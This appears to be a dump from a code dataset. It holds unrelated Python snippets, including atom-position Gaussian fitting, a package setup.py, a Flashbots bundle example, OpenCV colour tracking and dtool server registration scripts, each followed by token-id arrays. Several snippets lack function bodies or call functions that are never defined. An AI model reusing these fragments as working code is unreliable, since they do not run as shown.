    p_val, corr_surr, surrogates, r_value = surrogate_analysis(
        ts1, ts2, num_surr=1000, ts1_no_surr=True, rng=rng)

    num_ts = 2
    # One p-value per unique pair of time series.
    # BUG FIX: `/` produces a float under Python 3 and numpy rejects
    # non-integer array shapes; use floor division instead.
    p_vals = np.ones([num_ts * (num_ts - 1) // 2, 1]) * p_val

    # FDR-correct the p-values at q = 0.01 assuming positive dependence.
    q = 0.01
    method = 'pdep'
    h, crit_p = fdr(p_vals, q, method)

    print("p-value: {0}, h: {1} (critical p-value: {2})".format(p_val, h, crit_p))
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
11748,
299,
32152,
355,
45941,
198,
37659,
13,
2617,
62,
4798,
25811,
7,
3866,
16005,
28,
18,
11,
9493,
413,
5649,
28,
11645,
8,
198,
198,
6738,
20268,
37043,
889... | 2.07781 | 347 |
import setuptools
# Package metadata and build configuration for the xgbatch distribution.
setuptools.setup(
    name="xgbatch",
    version="0.0.2",
    author="Eric Henry",
    description="High Performance Serving for XGBoost",
    url="https://github.com/ehenry2/xgbatch",
    packages=["xgbatch"],
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    # Runtime dependencies; version floors only, no upper bounds.
    install_requires=[
        "pyarrow>=3.0.0",
        "xgboost>=1.0.0",
        "numpy>=1.0.0",
        "ujson",
        "opentracing"
    ],
    python_requires=">=3.6",
)
| [
11748,
900,
37623,
10141,
628,
198,
2617,
37623,
10141,
13,
40406,
7,
198,
220,
220,
220,
1438,
2625,
87,
22296,
963,
1600,
198,
220,
220,
220,
2196,
2625,
15,
13,
15,
13,
17,
1600,
198,
220,
220,
220,
1772,
2625,
25004,
8616,
1600,... | 2.149254 | 268 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-26 10:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
2980,
515,
416,
37770,
352,
13,
940,
13,
17,
319,
1584,
12,
1157,
12,
2075,
838,
25,
4051,
198,
6738,
11593,
37443,
834,
1330,
28000,
1098,
62,
17201,
874,
198,
1... | 2.73913 | 69 |
from eth_account.signers.local import LocalAccount
from web3.middleware import construct_sign_and_send_raw_middleware
from flashbots import flashbot
from flashbots.types import SignTx
from eth_account.account import Account
from web3 import Web3, HTTPProvider
from web3.types import TxParams, Wei
import os
"""
In this example we setup a transaction for 0.1 eth with a gasprice of 1
From here we will use Flashbots to pass a bundle with the needed content
"""
# Load the three accounts from environment variables: the flashbots
# signing identity plus the sender and receiver of the example transfer.
ETH_ACCOUNT_SIGNATURE: LocalAccount = Account.from_key(
    os.environ.get("ETH_SIGNATURE_KEY")
)
ETH_ACCOUNT_FROM: LocalAccount = Account.from_key(os.environ.get("ETH_PRIVATE_FROM"))
ETH_ACCOUNT_TO: LocalAccount = Account.from_key(os.environ.get("ETH_PRIVATE_TO"))
print("Connecting to RPC")
# Setup w3 and flashbots
w3 = Web3(HTTPProvider("http://localhost:8545"))
w3.middleware_onion.add(construct_sign_and_send_raw_middleware(ETH_ACCOUNT_FROM))
flashbot(w3, ETH_ACCOUNT_SIGNATURE)
print(
    f"From account {ETH_ACCOUNT_FROM.address}: {w3.eth.get_balance(ETH_ACCOUNT_FROM.address)}"
)
print(
    f"To account {ETH_ACCOUNT_TO.address}: {w3.eth.get_balance(ETH_ACCOUNT_TO.address)}"
)
# Set up a zero-fee transaction that is expected to sit in the pool so the
# flashbots bundle below can act on it.
# NOTE(review): the module docstring mentions "0.1 eth with a gasprice of
# 1" but the values here are 1 gwei with zero fees — confirm which is
# intended.
print("Sending request")
params: TxParams = {
    "from": ETH_ACCOUNT_FROM.address,
    "to": ETH_ACCOUNT_TO.address,
    "value": w3.toWei("1.0", "gwei"),
    "maxFeePerGas": 0,
    "maxPriorityFeePerGas": 0,
    "nonce": w3.eth.get_transaction_count(ETH_ACCOUNT_FROM.address),
}
try:
    tx = w3.eth.send_transaction(
        params,
    )
    print("Request sent! Waiting for receipt")
except ValueError as e:
    # Skipping if TX already is added and pending
    if "replacement transaction underpriced" in e.args[0]["message"]:
        print("Have TX in pool we can use for the example")
    else:
        raise
print("Setting up flashbots request")
nonce = w3.eth.get_transaction_count(ETH_ACCOUNT_FROM.address)
bribe = w3.toWei("0.01", "ether")
# Pre-sign the bribe transaction (sent from the TO account, next nonce).
signed_tx: SignTx = {
    "to": ETH_ACCOUNT_TO.address,
    "value": bribe,
    "nonce": nonce + 1,
    "maxFeePerGas": 0,
    "gas": 25000,
}
signed_transaction = ETH_ACCOUNT_TO.sign_transaction(signed_tx)
# The bundle: an unsigned transfer (signed by its "signer") followed by
# the pre-signed bribe.
bundle = [
    # some transaction
    {
        "signer": ETH_ACCOUNT_FROM,
        "transaction": {
            "to": ETH_ACCOUNT_TO.address,
            "value": Wei(123),
            "nonce": nonce,
            "maxFeePerGas": 0,
        },
    },
    # the bribe
    {
        "signed_transaction": signed_transaction.rawTransaction,
    },
]
block = w3.eth.block_number
# Target inclusion three blocks ahead, then block until mined.
result = w3.flashbots.send_bundle(bundle, target_block_number=w3.eth.blockNumber + 3)
result.wait()
receipts = result.receipts()
block_number = receipts[0].blockNumber
# the miner has received the amount expected
# NOTE(review): the balances below are read from ETH_ACCOUNT_FROM, not a
# miner/coinbase address, yet the comment and assertion treat the diff as
# the miner's bribe income — confirm this is the intended check.
bal_before = w3.eth.get_balance(ETH_ACCOUNT_FROM.address, block_number - 1)
bal_after = w3.eth.get_balance(ETH_ACCOUNT_FROM.address, block_number)
profit = bal_after - bal_before - w3.toWei("2", "ether")  # sub block reward
print("Balance before", bal_before)
print("Balance after", bal_after)
assert profit == bribe
# the tx is successful
print(w3.eth.get_balance(ETH_ACCOUNT_TO.address))
| [
6738,
4555,
62,
23317,
13,
12683,
364,
13,
12001,
1330,
10714,
30116,
198,
6738,
3992,
18,
13,
27171,
1574,
1330,
5678,
62,
12683,
62,
392,
62,
21280,
62,
1831,
62,
27171,
1574,
198,
198,
6738,
7644,
42478,
1330,
7644,
13645,
198,
673... | 2.557166 | 1,242 |
import cv2 as cv
    # HSV tuning / debugging entry point.
    # Call this method, passing in the image file path.
if __name__ == '__main__':
    # Usage example (Hsv_change is presumably defined above — verify):
    h=Hsv_change()
    h.inRange_byFilePath("chest/stage.jpg")
| [
11748,
269,
85,
17,
355,
269,
85,
198,
220,
220,
220,
1303,
11994,
85,
5525,
108,
225,
46237,
243,
198,
220,
198,
220,
198,
220,
220,
220,
22492,
5525,
108,
225,
18796,
101,
162,
105,
94,
43095,
37345,
243,
11,
27670,
254,
17739,
... | 1.4375 | 112 |
# -*- coding: utf-8 -*-
"""
@author: Ondrej Dyck
"""
from __future__ import division, print_function, absolute_import, unicode_literals
import numpy as np
from scipy.optimize import least_squares
import itertools as itt
import multiprocessing as mp
import time as tm
import matplotlib.pyplot as plt
from ...core.io.io_utils import recommend_cpu_cores
from ...io.virtual_data import VirtualDataset, VirtualGroup
from ...io.hdf_writer import HDFwriter
from ...core.viz.plot_utils import cmap_jet_white_center
def gauss_2d_residuals(parms_vec, orig_data_mat, x_data, y_data, **kwargs):
    """
    Calculates the residual between the data and the gaussian model.

    Parameters
    ----------
    parms_vec : 1D numpy.ndarray
        Raveled version of the parameters matrix (7 values per gaussian)
    orig_data_mat : 2D numpy array
        Section of the image being fitted
    x_data : 3D numpy.ndarray
    y_data : numpy.ndarray

    Returns
    -------
    err_vec : 1D numpy.ndarray
        Difference between the original data and the model evaluated with
        parms_vec at x_data / y_data
    """
    # The optimizer hands over a flat vector; view it as one 7-parameter
    # row per gaussian before evaluating the model.
    parms_mat = np.reshape(parms_vec, (-1, 7))
    model_vals = gauss2d(x_data, y_data, *parms_mat, **kwargs).ravel()
    return orig_data_mat - model_vals
def gauss2d(X, Y, *parms, **kwargs):
    """
    Calculates a general 2d elliptic gaussian

    Parameters
    ----------
    X, Y : the x and y matrix values from the call "X, Y = np.meshgrid(x,y)" where x and y are
           defined by x = np.arange(-width/2,width/2) and y = np.arange(-height/2,height/2).

    parms: List of 7 parameters defining the gaussian.
           The parameters are [A, x0, y0, sigma_x, sigma_y, theta, background]
           A : amplitude
           x0: x position
           y0: y position
           sigma_x: standard deviation in x
           sigma_y: standard deviation in y
           theta: rotation angle
           background: a background constant

    kwargs: 'symmetric' forces sigma_y = sigma_x; 'background' flag —
            NOTE(review): see in-code notes, the flag appears to have no
            effect as written.

    Returns
    -------
    Returns a width x height matrix of values representing the call to the gaussian function at each position.
    """
    symmetric = kwargs['symmetric']
    background = kwargs['background']
    Z = np.zeros(np.shape(X))
    background_value = parms[0][-1]  # we can only have one background value for the fit region
    for guess in parms:

        # each gaussian has a background associated with it but we only use the center atom background
        A, x0, y0, sigma_x, sigma_y, theta, background_unused = guess

        # determine which type of gaussian we want
        if symmetric:
            sigma_y = sigma_x
            if not background:
                background = 0
        else:
            if not background:
                background = 0
        # NOTE(review): the `background` flag is locally overwritten above
        # but never used afterwards — background_value is added regardless,
        # so the flag currently has no effect. Confirm intended behavior.

        # define some variables
        a = np.cos(theta) ** 2 / (2 * sigma_x ** 2) + np.sin(theta) ** 2 / (2 * sigma_y ** 2)
        b = -np.sin(2 * theta) / (4 * sigma_x ** 2) + np.sin(2 * theta) / (4 * sigma_y ** 2)
        c = np.sin(theta) ** 2 / (2 * sigma_x ** 2) + np.cos(theta) ** 2 / (2 * sigma_y ** 2)

        # calculate the final value
        # NOTE(review): background_value is added once per gaussian inside
        # this loop, so with N gaussians the constant is applied N times —
        # confirm whether it should be added only once to Z.
        Z += A * np.exp(- (a * (X - x0) ** 2 - 2 * b * (X - x0) * (Y - y0) + c * (Y - y0) ** 2)) + background_value
    return Z
class Gauss_Fit(object):
"""
Initializes the gaussian fitting routines:
fit_motif()
fit_atom_positions_parallel()
write_to_disk()
Parameters
----------
atom_grp : h5py.Group reference
Parent group containing the atom guess positions, cropped clean image and motif positions
fitting_parms : dictionary
Parameters used for atom position fitting
'fit_region_size': region to consider when fitting. Should be large enough to see the nearest neighbors.
'num_nearest_neighbors': the number of nearest neighbors to fit
'sigma_guess': starting guess for gaussian standard deviation. Should be about the size of an atom width in
pixels.
'position_range': range that the fitted position can move from initial guess position in pixels
'max_function_evals': maximum allowed function calls; passed to the least squares fitter
'fitting_tolerance': target difference between the fit and the data
'symmetric': flag to signal if a symmetric gaussian is desired (i.e. sigma_x == sigma_y)
'background': flag to signal if a background constant is desired
'movement_allowance': percent of movement allowed (on all parameters except x and y positions
"""
def fit_atom_positions_parallel(self, plot_results=True, num_cores=None):
"""
Fits the positions of N atoms in parallel
Parameters
----------
plot_results : optional boolean (default is True)
Specifies whether to output a visualization of the fitting results
num_cores : unsigned int (Optional. Default = available logical cores - 2)
Number of cores to compute with
Creates guess_dataset and fit_dataset with the results.
Returns
-------
fit_dataset: NxM numpy array of tuples where N is the number of atoms fit and M is the number of nearest
neighbors considered. Each tuple contains the converged values for each gaussian.
The value names are stored in the dtypes.
"""
t_start = tm.time()
if num_cores is None:
num_cores = recommend_cpu_cores(self.num_atoms, requested_cores=num_cores, lengthy_computation=False)
print('Setting up guesses')
self.guess_parms = []
for i in range(self.num_atoms):
self.guess_parms.append(self.do_guess(i))
print('Fitting...')
if num_cores > 1:
pool = mp.Pool(processes=num_cores)
parm_list = itt.izip(self.guess_parms, itt.repeat(self.fitting_parms))
chunk = int(self.num_atoms / num_cores)
jobs = pool.imap(do_fit, parm_list, chunksize=chunk)
self.fitting_results = [j for j in jobs]
pool.close()
else:
parm_list = itt.izip(self.guess_parms, itt.repeat(self.fitting_parms))
self.fitting_results = [do_fit(parm) for parm in parm_list]
print('Finalizing datasets...')
self.guess_dataset = np.zeros(shape=(self.num_atoms, self.num_nearest_neighbors + 1),
dtype=self.atom_coeff_dtype)
self.fit_dataset = np.zeros(shape=self.guess_dataset.shape, dtype=self.guess_dataset.dtype)
for atom_ind, single_atom_results in enumerate(self.fitting_results):
types = np.hstack((self.h5_guess['type'][atom_ind],
[self.h5_guess['type'][neighbor] for neighbor in self.closest_neighbors_mat[atom_ind]]))
atom_data = np.hstack((np.vstack(types), single_atom_results))
atom_data = [tuple(element) for element in atom_data]
self.fit_dataset[atom_ind] = atom_data
single_atom_guess = self.guess_parms[atom_ind]
atom_guess_data = np.hstack((np.vstack(types), single_atom_guess[1]))
atom_guess_data = [tuple(element) for element in atom_guess_data]
self.guess_dataset[atom_ind] = atom_guess_data
tot_time = np.round(tm.time() - t_start)
print('Took {} sec to find {} atoms with {} cores'.format(tot_time, len(self.fitting_results), num_cores))
# if plotting is desired
if plot_results:
fig, axis = plt.subplots(figsize=(14, 14))
axis.hold(True)
axis.imshow(self.cropped_clean_image, interpolation='none', cmap="gray")
axis.scatter(self.guess_dataset[:, 0]['y'], self.guess_dataset[:, 0]['x'], color='yellow', label='Guess')
axis.scatter(self.fit_dataset[:, 0]['y'], self.fit_dataset[:, 0]['x'], color='red', label='Fit')
axis.legend()
fig.tight_layout()
fig.show()
return self.fit_dataset
def do_guess(self, atom_ind, initial_motifs=False):
"""
Fits the position of a single atom.
Parameters
----------
atom_ind : int
The index of the atom to generate guess parameters for
initial_motifs : optional boolean (default is False)
Specifies whether we are generating guesses for the initial motifs. Subsequent guesses
have the advantage of the fits from the motifs and will be much better starting values.
Returns
-------
atom_ind : int
The index of the atom to generate guess parameters for
coef_guess_mat : 2D numpy array
Initial guess parameters for all the gaussians.
fit_region : 2D numpy array
The fit region cropped from the image
s1 and s2 : 2D numpy arrays
The required input for the X and Y parameters of gauss2d
lb_mat and ub_mat : 2D numpy arrays
The lower and upper bounds for the fitting.
"""
fit_region_size = self.fitting_parms['fit_region_size']
movement_allowance = self.fitting_parms['movement_allowance']
position_range = self.fitting_parms['position_range']
# start writing down initial guesses
x_center_atom = self.h5_guess['x'][atom_ind]
y_center_atom = self.h5_guess['y'][atom_ind]
x_neighbor_atoms = [self.h5_guess['x'][self.closest_neighbors_mat[atom_ind][i]] for i in
range(self.num_nearest_neighbors)]
y_neighbor_atoms = [self.h5_guess['y'][self.closest_neighbors_mat[atom_ind][i]] for i in
range(self.num_nearest_neighbors)]
# select the window we're going to be fitting
x_range = slice(max(int(np.round(x_center_atom - fit_region_size)), 0),
min(int(np.round(x_center_atom + fit_region_size)),
self.cropped_clean_image.shape[0]))
y_range = slice(max(int(np.round(y_center_atom - fit_region_size)), 0),
min(int(np.round(y_center_atom + fit_region_size)),
self.cropped_clean_image.shape[1]))
fit_region = self.cropped_clean_image[x_range, y_range]
# define x and y fitting range
s1, s2 = np.meshgrid(range(x_range.start, x_range.stop),
range(y_range.start, y_range.stop))
# guesses are different if we're fitting the initial windows
if initial_motifs:
# If true, we need to generate more crude guesses
# for the initial motif window fitting.
# Once these have been fit properly they will act
# as the starting point for future guesses.
# put the initial guesses into the proper form
x_guess = np.hstack((x_center_atom, x_neighbor_atoms))
y_guess = np.hstack((y_center_atom, y_neighbor_atoms))
sigma_x_center_atom = self.fitting_parms['sigma_guess']
sigma_y_center_atom = self.fitting_parms['sigma_guess']
sigma_x_neighbor_atoms = [self.fitting_parms['sigma_guess'] for i in
range(self.num_nearest_neighbors)]
sigma_y_neighbor_atoms = [self.fitting_parms['sigma_guess'] for i in
range(self.num_nearest_neighbors)]
theta_center_atom = 0
theta_neighbor_atoms = np.zeros(self.num_nearest_neighbors)
background_center_atom = np.min(fit_region)
# The existence of a background messes up a straight forward gaussian amplitude guess,
# so we add/subtract the background value from the straight forward guess depending
# on if the background is positive or negative.
if np.min(fit_region) < 0:
a_guess = self.cropped_clean_image[
np.rint(x_guess).astype(int), np.rint(y_guess).astype(int)] - background_center_atom
else:
a_guess = self.cropped_clean_image[
np.rint(x_guess).astype(int), np.rint(y_guess).astype(int)] + background_center_atom
sigma_x_guess = np.hstack((sigma_x_center_atom, sigma_x_neighbor_atoms))
sigma_y_guess = np.hstack((sigma_y_center_atom, sigma_y_neighbor_atoms))
theta_guess = np.hstack((theta_center_atom, theta_neighbor_atoms))
background_guess = np.hstack([background_center_atom for num in range(
self.num_nearest_neighbors + 1)]) # we will only need one background
coef_guess_mat = np.transpose(np.vstack((a_guess, x_guess, y_guess, sigma_x_guess, sigma_y_guess,
theta_guess, background_guess)))
else:
# otherwise better guesses are assumed to exist
motif_type = self.h5_guess['type'][atom_ind]
coef_guess_mat = np.copy(self.motif_converged_parms[motif_type])
coef_guess_mat[:, 1] = self.h5_guess['x'][atom_ind] + coef_guess_mat[:, 1]
coef_guess_mat[:, 2] = self.h5_guess['y'][atom_ind] + coef_guess_mat[:, 2]
# Choose upper and lower bounds for the fitting
#
# Address negatives first
lb_a = []
ub_a = []
for item in coef_guess_mat[:, 0]: # amplitudes
if item < 0:
lb_a.append(item + item * movement_allowance)
ub_a.append(item - item * movement_allowance)
else:
lb_a.append(item - item * movement_allowance)
ub_a.append(item + item * movement_allowance)
lb_background = []
ub_background = []
for item in coef_guess_mat[:, 6]: # background
if item < 0:
lb_background.append(item + item * movement_allowance)
ub_background.append(item - item * movement_allowance)
else:
lb_background.append(item - item * movement_allowance)
ub_background.append(item + item * movement_allowance)
# Set up upper and lower bounds:
lb_mat = [lb_a, # amplitude
coef_guess_mat[:, 1] - position_range, # x position
coef_guess_mat[:, 2] - position_range, # y position
[np.max([0, value - value * movement_allowance]) for value in coef_guess_mat[:, 3]], # sigma x
[np.max([0, value - value * movement_allowance]) for value in coef_guess_mat[:, 4]], # sigma y
coef_guess_mat[:, 5] - 2 * 3.14159, # theta
lb_background] # background
ub_mat = [ub_a, # amplitude
coef_guess_mat[:, 1] + position_range, # x position
coef_guess_mat[:, 2] + position_range, # y position
coef_guess_mat[:, 3] + coef_guess_mat[:, 3] * movement_allowance, # sigma x
coef_guess_mat[:, 4] + coef_guess_mat[:, 4] * movement_allowance, # sigma y
coef_guess_mat[:, 5] + 2 * 3.14159, # theta
ub_background] # background
lb_mat = np.transpose(lb_mat)
ub_mat = np.transpose(ub_mat)
check_bounds = False
if check_bounds:
for i, item in enumerate(coef_guess_mat):
for j, value in enumerate(item):
if lb_mat[i][j] > value or ub_mat[i][j] < value:
print('Atom number: {}'.format(atom_ind))
print('Guess: {}'.format(item))
print('Lower bound: {}'.format(lb_mat[i]))
print('Upper bound: {}'.format(ub_mat[i]))
print('dtypes: {}'.format(self.atom_coeff_dtype.names))
raise ValueError('{} guess is out of bounds'.format(self.atom_coeff_dtype.names[j]))
return atom_ind, coef_guess_mat, fit_region, s1, s2, lb_mat, ub_mat
@staticmethod
def write_to_disk(self):
"""
Writes the gaussian fitting results to disk
Parameters
----------
Returns
-------
Returns the atom parent group containing the original data and the newly written data:
Gaussian_Guesses
Gaussian_Fits
Motif_Guesses
Motif_Fits
Nearest_Neighbor_Indices
"""
ds_atom_guesses = VirtualDataset('Gaussian_Guesses', data=self.guess_dataset)
ds_atom_fits = VirtualDataset('Gaussian_Fits', data=self.fit_dataset)
ds_motif_guesses = VirtualDataset('Motif_Guesses', data=self.motif_guess_dataset)
ds_motif_fits = VirtualDataset('Motif_Fits', data=self.motif_converged_dataset)
ds_nearest_neighbors = VirtualDataset('Nearest_Neighbor_Indices',
data=self.closest_neighbors_mat, dtype=np.uint32)
dgrp_atom_finding = VirtualGroup(self.atom_grp.name.split('/')[-1], parent=self.atom_grp.parent.name)
dgrp_atom_finding.attrs = self.fitting_parms
dgrp_atom_finding.add_children([ds_atom_guesses, ds_atom_fits, ds_motif_guesses,
ds_motif_fits, ds_nearest_neighbors])
hdf = HDFwriter(self.atom_grp.file)
h5_atom_refs = hdf.write(dgrp_atom_finding)
hdf.flush()
return self.atom_grp
def fit_motif(self, plot_results=True):
"""
Parameters
----------
plot_results: boolean (default = True)
Flag to specify whether a result summary should be plotted
Returns
-------
motif_converged_dataset: NxM numpy array of tuples where N is the number of motifs and M is the number
of nearest neighbors considered. Each tuple contains the converged parameters for a gaussian fit to
an atom in a motif window.
"""
self.motif_guesses = []
self.motif_parms = []
self.motif_converged_parms = []
self.fit_motifs = []
fit_region = []
# generate final dataset forms
self.motif_guess_dataset = np.zeros(shape=(self.motif_centers.shape[0], self.num_nearest_neighbors + 1),
dtype=self.motif_coeff_dtype)
self.motif_converged_dataset = np.zeros(shape=(self.motif_centers.shape[0], self.num_nearest_neighbors + 1),
dtype=self.motif_coeff_dtype)
for motif in range(len(self.motif_centers)):
# get guesses
self.motif_parms.append(self.do_guess(self.center_atom_indices[motif], initial_motifs=True))
# pull out parameters for generating the gaussians
coef_guess_mat = self.motif_parms[motif][1]
s1 = self.motif_parms[motif][3].T
s2 = self.motif_parms[motif][4].T
fit_region.append(self.motif_parms[motif][2])
# put guesses into final dataset form
self.motif_guess_dataset[motif] = [tuple(element) for element in coef_guess_mat]
# store the guess results for plotting
self.motif_guesses.append(gauss2d(s1, s2, *coef_guess_mat, **self.fitting_parms))
# fit the motif with num_nearest_neighbors + 1 gaussians
parm_list = [self.motif_parms[motif], self.fitting_parms]
fitting_results = do_fit(parm_list)
# store the converged results
self.motif_converged_parms.append(fitting_results)
self.motif_converged_dataset[motif] = [tuple(element) for element in fitting_results]
# store the images of the converged gaussians
self.fit_motifs.append(gauss2d(s1, s2, *fitting_results, **self.fitting_parms))
# calculate the relative atom positions (instead of absolute)
fitting_results[:, 1] = fitting_results[:, 1] - self.motif_centers[motif][0]
fitting_results[:, 2] = fitting_results[:, 2] - self.motif_centers[motif][1]
# plot results if desired
if plot_results:
# initialize the figure
fig, axes = plt.subplots(ncols=3, nrows=len(self.motif_centers), figsize=(14, 6 * len(self.motif_centers)))
for i, ax_row in enumerate(np.atleast_2d(axes)):
# plot the original windows
ax_row[0].imshow(fit_region[i], interpolation='none',
cmap=cmap_jet_white_center())
ax_row[0].set_title('Original Window')
# plot the initial guess windows
ax_row[1].imshow(self.motif_guesses[i], interpolation='none',
cmap=cmap_jet_white_center())
ax_row[1].set_title('Initial Gaussian Guesses')
# plot the converged gaussians
ax_row[2].imshow(self.fit_motifs[i], interpolation='none',
cmap=cmap_jet_white_center())
ax_row[2].set_title('Converged Gaussians')
fig.show()
return self.motif_converged_dataset
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
37811,
201,
198,
31,
9800,
25,
440,
358,
260,
73,
23524,
694,
201,
198,
37811,
201,
198,
201,
198,
6738,
11593,
37443,
834,
1330,
7297,
11,
3601,
62,
8818,
11,
... | 2.06013 | 10,494 |
import string
import unittest
from collections import Counter
from main import extract_characters, generate_password
if __name__ == '__main__':
unittest.main() | [
11748,
4731,
198,
11748,
555,
715,
395,
198,
6738,
17268,
1330,
15034,
198,
6738,
1388,
1330,
7925,
62,
10641,
19858,
11,
7716,
62,
28712,
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
555,
71... | 3.586957 | 46 |
import asyncio
import os
import sys
from datetime import datetime, timedelta
import aiohttp
import pytest
from bungieapi.base import Token
from bungieapi.client import Client, Credentials
from bungieapi.forge import forge
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture(scope="session")
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture()
@pytest.fixture
@pytest.fixture
@pytest.fixture
| [
11748,
30351,
952,
198,
11748,
28686,
198,
11748,
25064,
198,
6738,
4818,
8079,
1330,
4818,
8079,
11,
28805,
12514,
198,
198,
11748,
257,
952,
4023,
198,
11748,
12972,
9288,
198,
198,
6738,
43974,
494,
15042,
13,
8692,
1330,
29130,
198,
... | 2.752874 | 174 |
#! /usr/bin/env python
"""Parse event definitions out of comments in source files."""
import re
import sys
import os
import string
import getopt
import glob
import fileinput
import pprint
if __name__ == '__main__':
sys.exit(main())
| [
2,
0,
1220,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
37811,
10044,
325,
1785,
17336,
503,
286,
3651,
287,
2723,
3696,
526,
15931,
198,
198,
11748,
302,
198,
11748,
25064,
198,
11748,
28686,
198,
11748,
4731,
198,
11748,
651,
8738,
... | 3.186667 | 75 |
#code based on example found at:
#http://www.pyimagesearch.com/2015/09/14/ball-tracking-with-opencv/
# import the necessary packages
from collections import deque
import numpy as np
import argparse
import imutils
import cv2
import time as t
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--video",
help="path to the (optional) video file")
ap.add_argument("-b", "--buffer", type=int, default=32,
help="max buffer size")
ap.add_argument("-r", "--real", type=str, default="real",
help="real image or mask")
ap.add_argument("-t", "--type", type=str, default="blank",
help="type of find")
args = vars(ap.parse_args())
real = args.get("real")
typ = args.get("type")
raspi = False
if typ == "blank":
greenLower = (0, 0, 0)
greenUpper = (0, 0, 0)
elif typ == "BD":
greenLower = (71, 32, 37)
greenUpper = (203, 67, 65)
elif typ == "Servo":
greenLower = (72, 80, 26)
greenUpper = (140, 165, 142)
elif typ == "ppbo":
greenLower = (14, 20, 157)
greenUpper = (40, 228, 246)
elif typ == "TAC":
greenLower = (0, 16, 46)
greenUpper = (183, 170, 105)
elif typ == "bby":
greenLower = (17,121,76)
greenUpper = (52,228,218)
elif typ == "plier":
greenLower = (73,108,78)
greenUpper = (100,201,149)
elif typ == "bluey":
greenLower = (108,222,155)
greenUpper = (126,245,234)
#my eyes(broken)
#greenLower = (106, 84, 38)
#greenUpper = (138, 143, 55)
pts = deque(maxlen=args["buffer"])
# if a video path was not supplied, grab the reference
# to the webcam
if not args.get("video", False):
if raspi:
camera = cv2.VideoCapture("/dev/stdin")
else:
camera = cv2.VideoCapture(0)
# otherwise, grab a reference to the video file
else:
camera = cv2.VideoCapture(args["video"])
# keep looping
while True:
# grab the current frame
(grabbed, frame) = camera.read()
# if we are viewing a video and we did not grab a frame,
# then we have reached the end of the video
if args.get("video") and not grabbed:
break
# resize the frame, blur it, and convert it to the HSV
# color space
frame = imutils.resize(frame, width=600)
# blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# construct a mask for the color "green", then perform
# a series of dilations and erosions to remove any small
# blobs left in the mask
mask = cv2.inRange(hsv, greenLower, greenUpper)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# find contours in the mask and initialize the current
# (x, y) center of the ball
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)[-2]
center = None
# only proceed if at least one contour was found
if len(cnts) > 0:
# find the largest contour in the mask, then use
# it to compute the minimum enclosing circle and
# centroid
c = max(cnts, key=cv2.contourArea)
((x, y), radius) = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
# only proceed if the radius meets a minimum size
if radius > 10:
# draw the circle and centroid on the frame,
# then update the list of tracked points
cv2.circle(frame, (int(x), int(y)), int(radius),
(0, 255, 255), 2)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
# update the points queue
pts.appendleft(center)
# loop over the set of tracked points
for i in xrange(1, len(pts)):
# if either of the tracked points are None, ignore
# them
if pts[i - 1] is None or pts[i] is None:
continue
# otherwise, compute the thickness of the line and
# draw the connecting lines
thickness = int(np.sqrt(args["buffer"] / float(i + 1)) * 2.5)
cv2.line(frame, pts[i - 1], pts[i], (0, 0, 0), thickness)
# show the frame to our screen
if real == "real":
cv2.imshow("Frame", frame)
elif real == "mask":
cv2.imshow("Frame",mask)
else:
cv2.imshow("Frame",hsv)
key = cv2.waitKey(1) & 0xFF
# if the 'q' key is pressed, stop the loop
if key == ord("q"):
break
#t.sleep(0.1)
# cleanup the camera and close any open windows
camera.release()
cv2.destroyAllWindows()
| [
2,
8189,
1912,
319,
1672,
1043,
379,
25,
198,
2,
4023,
1378,
2503,
13,
9078,
17566,
3679,
13,
785,
14,
4626,
14,
2931,
14,
1415,
14,
1894,
12,
36280,
12,
4480,
12,
9654,
33967,
14,
198,
2,
1330,
262,
3306,
10392,
198,
6738,
17268,... | 2.499409 | 1,692 |
import io
import requests
import os
from .input_file import InputFile
from .exception import AppwriteException
| [
11748,
33245,
198,
11748,
7007,
198,
11748,
28686,
198,
6738,
764,
15414,
62,
7753,
1330,
23412,
8979,
198,
6738,
764,
1069,
4516,
1330,
2034,
13564,
16922,
628
] | 4.148148 | 27 |
import click
import requests
import yaml
from dtool_lookup_server.utils import (
iter_datasets_in_base_uri,
generate_dataset_info,
)
def get_projects(fpath):
"""Return projects dictionary."""
with open(fpath) as fh:
projects = yaml.load(fh, Loader=yaml.FullLoader)
return projects
def get_header(token):
"""Return HTTP header."""
return {
"Content-Type": "application/json",
"Authorization": "Bearer {}".format(token),
}
def register_base_uris(projects_fpath, token, lookup_server_url):
"Register base URIs."
projects = get_projects(projects_fpath)
for b_uri in projects.keys():
data = {"base_uri": b_uri}
response = requests.post(
lookup_server_url + "/admin/base_uri/register",
headers=get_header(token),
json=data,
verify=False
)
print(data)
print(response.status_code, response.reason)
def register_users(projects_fpath, token, lookup_server_url):
"Register users."
projects = get_projects(projects_fpath)
users = set()
for base_uri, permissions in projects.items():
for p in ["register", "search"]:
for u in permissions[p]:
users.add(u)
data = []
for u in users:
data.append({"username": u})
response = requests.post(
lookup_server_url + "/admin/user/register",
headers=get_header(token),
json=data,
verify=False
)
print(data)
print(response.status_code, response.reason)
def register_permissions(projects_fpath, token, lookup_server_url):
"Register permissions."
projects = get_projects(projects_fpath)
for b_uri, permissions in projects.items():
data = {"base_uri": b_uri}
register_permissions = []
for u in permissions["register"]:
register_permissions.append(u)
data["users_with_register_permissions"] = register_permissions
